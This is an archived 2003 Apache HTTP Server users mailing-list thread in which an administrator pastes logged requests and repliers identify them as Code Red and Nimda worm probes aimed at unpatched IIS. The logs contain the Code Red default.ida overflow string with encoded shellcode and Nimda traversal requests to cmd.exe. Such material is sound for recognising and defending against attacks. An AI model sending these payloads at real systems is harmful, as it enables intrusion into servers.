You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by John Doumani <fu...@attbi.com> on 2003/04/09 01:41:20 UTC
[users@httpd] strange hits being logged -Worm?
Hello,
I have recently started seeing these lines of code repeated in my log files
for each virtual host. Is this a worm or some other attack on my server?
If so, what is the best way to protect the server from attack?
John
12.210.8.252 - - [07/Apr/2003:15:21:08 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 -
12.210.23.223 - - [07/Apr/2003:15:58:39 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:07 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:11 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.8.252 - - [07/Apr/2003:16:18:19 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0
000%u00=a HTTP/1.0" 404 -
<<><<>><<>><<>><<>><<>>
John e Doumani
fuguma@attbi.com
~Navigating the Web long before the Internet~
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] strange hits being logged -Worm?
Posted by Zac Stevens <zt...@cryptocracy.com>.
On Tue, Apr 08, 2003 at 08:25:21PM -0400, Jeremy D. Weiss wrote:
> Question to the list in general: I know there are FAQs on Apache's site,
> might this be added to them? There seem to have been a LOT of question
> about it, recently...
Given that the signatures change with every new worm, I see little point in
putting them into the Apache FAQ. It's not related to Apache, and I'm not
sure who would volunteer to keep the list up to date :)
My opinion is that the answers to these questions are readily found by
searching Google, the list archives, or a security-oriented site such as
CERT or Bugtraq. With that much duplication already, adding them to the
FAQ doesn't seem worthwhile...
Zac
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] strange hits being logged -Worm?
Posted by "Jeremy D. Weiss" <jd...@chanweiss.com>.
At 04:41 PM 04/08/2003 -0700, you wrote:
>Hello,
>
>I have recently started seeing these lines of code repeated in my log files
>for each virtual host. Is this a worm or some other attack on my server?
>
>If so, what is the best way to protect the server from attack?
all of the attacks listed (which I have snipped for readability's sake) are
of the nimda/code red variety. Assuming you are running Apache (what with
posting to this list, and all :) there is absolutely nothing you need to
do, to be protected... only IIS is vulnerable to those attacks.
Question to the list in general: I know there are FAQs on Apache's site,
might this be added to them? There seem to have been a LOT of question
about it, recently...
==Jeremy
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
RE: [users@httpd] strange hits being logged -Worm?
Posted by Koen Vingerhoets <ko...@ubench.com>.
Hi!!
code red code red call the marines!!!
It only affects (unpatched) IIS systems... no need to worry.
If you look through the archives, you'll find several users that have posted
their settings to ignore these entries or tu dump them in another file.
Koen
-----Original Message-----
From: John Doumani [mailto:fuguma@attbi.com]
Sent: 09 April 2003 02:41
To: users@httpd.apache.org
Subject: [users@httpd] strange hits being logged -Worm?
Hello,
I have recently started seeing these lines of code repeated in my log files
for each virtual host. Is this a worm or some other attack on my server?
If so, what is the best way to protect the server from attack?
John
12.210.8.252 - - [07/Apr/2003:15:21:08 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 -
12.210.23.223 - - [07/Apr/2003:15:58:39 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:05 -0700] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:06 -0700] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:07 -0700] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:08 -0700] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:09 -0700] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
12.210.0.150 - - [07/Apr/2003:16:16:10 -0700] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.0.150 - - [07/Apr/2003:16:16:11 -0700] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
12.210.8.252 - - [07/Apr/2003:16:18:19 -0700] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0
000%u00=a HTTP/1.0" 404 -
<<><<>><<>><<>><<>><<>>
John e Doumani
fuguma@attbi.com
~Navigating the Web long before the Internet~
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org